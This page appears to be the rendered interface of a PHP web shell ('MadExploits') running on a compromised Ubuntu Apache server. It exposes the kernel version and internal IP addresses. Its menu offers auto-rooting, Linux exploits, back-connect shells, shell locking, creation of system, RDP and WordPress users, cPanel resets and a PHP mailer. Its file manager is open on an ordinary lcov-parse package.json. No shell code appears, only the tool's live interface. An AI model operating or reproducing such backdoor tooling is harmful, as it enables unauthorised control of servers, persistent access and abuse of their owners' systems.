Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
lcov-parse /
[ HOME SHELL ]
Name
Size
Permission
Action
bin
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
package.json
967
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "lcov-parse", "description": "Parse lcov results files and return JSON", "version": "1.0.0", "author": "Dav Glass <davglass@gmail.com>", "contributors": [ "Alan Gutierrez <alan@prettyrobots.com>", "Gerard Escalante <gerard@saygo.ca>", "Daniel Howe <dhowe@swipeclock.com>" ], "bin": { "lcov-parse": "./bin/cli.js" }, "bugs": { "url": "http://github.com/davglass/lcov-parse/issues" }, "main": "./lib/index", "tags": [ "lcov", "json", "coverage", "parser" ], "devDependencies": { "istanbul": "^0.2.10", "jshint": "^2.5.1", "vows": "*", "yui-lint": "~0.1.1" }, "scripts": { "pretest": "jshint --config ./node_modules/yui-lint/jshint.json ./lib/", "test": "istanbul cover --print both ./node_modules/vows/bin/vows -- --spec ./tests/*.js" }, "license": "BSD-3-Clause", "repository": { "type": "git", "url": "http://github.com/davglass/lcov-parse.git" } }
Close